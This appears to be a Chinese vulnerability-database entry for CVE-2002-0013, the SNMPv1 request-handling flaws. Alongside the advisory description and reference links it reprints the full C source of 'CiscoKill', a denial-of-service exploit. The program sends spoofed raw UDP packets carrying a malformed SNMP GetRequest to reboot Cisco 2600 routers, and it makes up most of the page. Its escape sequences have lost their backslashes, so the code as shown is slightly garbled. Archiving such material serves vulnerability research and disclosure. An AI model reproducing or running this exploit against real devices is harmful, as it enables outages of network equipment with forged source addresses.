多家厂商SNMP实现中SNMPv1请求处理存在多个安全漏洞

漏洞ID	1106612	漏洞类型	权限许可和访问控制
发布时间	2002-02-12	更新时间	2005-10-20
CVE编号	CVE-2002-0013	CNNVD-ID	CNNVD-200202-004
漏洞平台	Hardware	CVSS评分	10.0

|漏洞来源

https://www.exploit-db.com/exploits/21296
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200202-004

|漏洞详情

SNMP请求是管理系统给代理系统发送的消息，它们通常询问代理系统当前性能和配置信息，请求ManagementInformationBase(MIB)的下一个SNMP对象，或者修改代理的配置。许多SNMP的实现被发现了多个漏洞。这些漏洞发生在SNMP信息的解码和解释的处理上。PROTOS小组开发的c06-SNMPv1测试工具已经发现众多厂商的SNMP实现中对SNMP请求的处理中存在大量的安全问题，攻击者可能通过GetRequest、GetNextRequest、SetRequest命令来使远程SNMP服务器崩溃甚至以SNMP服务器运行权限执行任意代码。各种受影响产品各自的影响程度各不一致。

|漏洞EXP

source: http://www.securityfocus.com/bid/4132/info

Cisco products contain multiple vulnerabilities in handling of SNMP requests and traps. A general report for multiple vendors was initially published on February 12 (Bugtraq IDs 4088 and 4089), however more information is now available and a separate Bugtraq ID has been allocated for the Cisco Operating Systems and Appliances vulnerabilities.

It is reportedly possible for a remote attacker to create a denial of service condition by transmitting a malformed SNMP request to a vulnerable Cisco Operating System or Appliance. The affected device may reset, or require a manual reset to regain functionality. 

/* This program send a spoofed snmpv1 get request that cause system reboot
   on Cisco 2600 routers with IOS version 12.0(10) 

   Author : [email protected]   ... don't be lame use for testing only! ..:) */

#include 		<stdio.h>
#include 		<string.h>
#include 		<unistd.h>
#include 		<stdlib.h>
#include 		<sys/socket.h>
#include 		<netinet/in.h>
#include		<netinet/ip.h>
#include		<netinet/udp.h>
#include		<arpa/inet.h>

	

struct in_addr sourceip_addr;
struct in_addr destip_addr;
struct sockaddr_in dest;

struct ip          *IP;  
struct udphdr      *UDP;   
int p_number=1,sok,datasize,i=0; 

char *packet,*source,*target; 
char *packetck;
char *data,c;

char snmpkill[] =  
  "x30x81xafx02x01x00x04x06x70x75x62x6cx69x63xa0x81"  
  "xa1x02x02x09x28x02x01x00x02x01x00x30x81x94x30x81"  
  "x91x06x81x8cx4dx73x25x73x25x73x25x73x25x73x25x73"  
  "x25x73x25x73x25x73x25x73x25x73x25x73x25x73x25x73"  
  "x25x73x25x73x25x73x25x73x25x73x25x73x25x73x25x73"  
  "x25x73x25x73x25x73x25x73x25x73x25x73x25x73x25x73"  
  "x25x73x25x73x25x73x25x73x25x73x25x73x25x73x25x73"  
  "x25x73x25x73x25x73x25x73x25x73x25x73x25x73x25x73"  
  "x25x73x25x73x25x73x25x73x25x73x25x73x25x73x25x73"  
  "x25x73x25x73x25x73x25x73x25x73x25x73x25x73x25x73"  
  "x25x73x25x73x25x73x81xffxffxffxffxffxffxffxffx7f"  
  "x05";


struct pseudoudp {
u_long ipsource;
u_long ipdest;
char zero;
char proto;
u_short length;
} *psudp;


in_cksum (unsigned short *ptr, int nbytes)
{

  register long sum;		/* assumes long == 32 bits */
  u_short oddbyte;
  register u_short answer;	/* assumes u_short == 16 bits */

  /*
   * Our algorithm is simple, using a 32-bit accumulator (sum),
   * we add sequential 16-bit words to it, and at the end, fold back
   * all the carry bits from the top 16 bits into the lower 16 bits.
   */

  sum = 0;
  while (nbytes > 1)
    {
      sum += *ptr++;
      nbytes -= 2;
    }

  /* mop up an odd byte, if necessary */
  if (nbytes == 1)
    {
      oddbyte = 0;		/* make sure top half is zero */
      *((u_char *) & oddbyte) = *(u_char *) ptr;	/* one byte only */
      sum += oddbyte;
    }

  /*
   * Add back carry outs from top 16 bits to low 16 bits.
   */

  sum = (sum >> 16) + (sum & 0xffff);	/* add high-16 to low-16 */
  sum += (sum >> 16);		/* add carry */
  answer = ~sum;		/* ones-complement, then truncate to 16 bits */
  return (answer);
}


void usage (void)
{
printf("Kundera CiscoKill v1.0n");
printf("Usage: ciscokill [-n number of packets] [-s source ip_addr] -t ip_target n");
}



int main(int argc,char **argv){

if (argc < 2){
usage();
exit(1);
}

while((c=getopt(argc,argv,"s:t:n:"))!=EOF){
	switch(c) {
	 case 's': source=optarg; break;
	 case 'n': p_number=atoi(optarg); break;
	 case 't': target=optarg;
	 }
}

if ( (sok=socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) < 0)
{
	printf("Can't create socket.n");
        exit(EXIT_FAILURE);
}

destip_addr.s_addr=inet_addr(target);
sourceip_addr.s_addr=inet_addr(source);

datasize=sizeof(snmpkill);

packet = ( char * )malloc( 20 + 8 + datasize );

IP     = (struct ip     *)packet; 

memset(packet,0,sizeof(packet)); 
        
        IP->ip_dst.s_addr  = destip_addr.s_addr;
        IP->ip_src.s_addr  = sourceip_addr.s_addr;
        IP->ip_v = 4;
        IP->ip_hl = 5;
        IP->ip_ttl = 245;
        IP->ip_id = htons(666);
        IP->ip_p = 17;
        IP->ip_len  = htons(20 + 8 + datasize);
        IP->ip_sum    = in_cksum((u_short *)packet,20);

 
UDP   = (struct udphdr    *)(packet+20);
      UDP->source = htons(666); 
      UDP->dest   = htons(161);
      UDP->len     = htons(8+datasize);
      UDP->check = 0;
      packetck = (char *)malloc(8 + datasize + sizeof(struct pseudoudp));
      bzero(packetck,8 + datasize + sizeof(struct pseudoudp));     
      psudp = (struct pseudoudp *) (packetck);
      psudp->ipdest = destip_addr.s_addr;
      psudp->ipsource = sourceip_addr.s_addr;
      psudp->zero = 0;
      psudp->proto = 17;
      psudp->length = htons(8+datasize);
      memcpy(packetck+sizeof(struct pseudoudp),UDP,8+datasize);
      memcpy(packetck+sizeof(struct pseudoudp)+8,snmpkill,datasize);

      UDP->check = in_cksum((u_short *)packetck,8+datasize+sizeof(struct pseudoudp));    

data   = (unsigned char    *)(packet+20+8); 
memcpy(data,snmpkill,datasize);  
                                                                                                     
dest.sin_family=AF_INET;
dest.sin_addr.s_addr=destip_addr.s_addr;                                                                        

while (i<p_number)
{
if (( sendto(sok,packet,20+8+datasize,0,( struct sockaddr * ) &dest,sizeof(dest)))<0)
{
printf("Error sending packet.n");
exit(EXIT_FAILURE);
}

i++;

}
printf("%d packets sent.n",i);

}

|参考资料

来源:US-CERTVulnerabilityNote:VU#854306
名称:VU#854306
链接:http://www.kb.cert.org/vuls/id/854306
来源:CERT/CCAdvisory:CA-2002-03
名称:CA-2002-03
链接:http://www.cert.org/advisories/CA-2002-03.html
来源:MS
名称:MS02-006
链接:http://www.microsoft.com/technet/security/bulletin/MS02-006.asp
来源:SUNALERT
名称:57404
链接:http://sunsolve.sun.com/search/document.do?assetkey=1-26-57404-1
来源:SGI
名称:20020201-01-A
链接:ftp://patches.sgi.com/support/free/security/advisories/20020201-01-A
来源:REDHAT
名称:RHSA-2001:163
链接:http://www.redhat.com/support/errata/RHSA-2001-163.html
来源:ISS
名称:20020212PROTOSRemoteSNMPAttackTool
链接:http://www.iss.net/security_center/alerts/advise110.php
来源:www.ee.oulu.fi
链接:http://www.ee.oulu.fi/research/ouspg/protos/testing/c06/snmpv1/index.html
来源:USGovernmentResource:oval:org.mitre.oval:def:87
名称:oval:org.mitre.oval:def:87
链接:http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:87
来源:USGovernmentResource:oval:org.mitre.oval:def:298
名称:oval:org.mitre.oval:def:298
链接:http://oval.m

相关推荐: Cisco IOS Software Input Access List Leakage with NAT

Cisco IOS Software Input Access List Leakage with NAT 漏洞ID 1104774 漏洞类型 Origin Validation Error 发布时间 1999-04-13 更新时间 1999-04-13 CV…

文章版权归作者所有，未经允许请勿转载。

THE END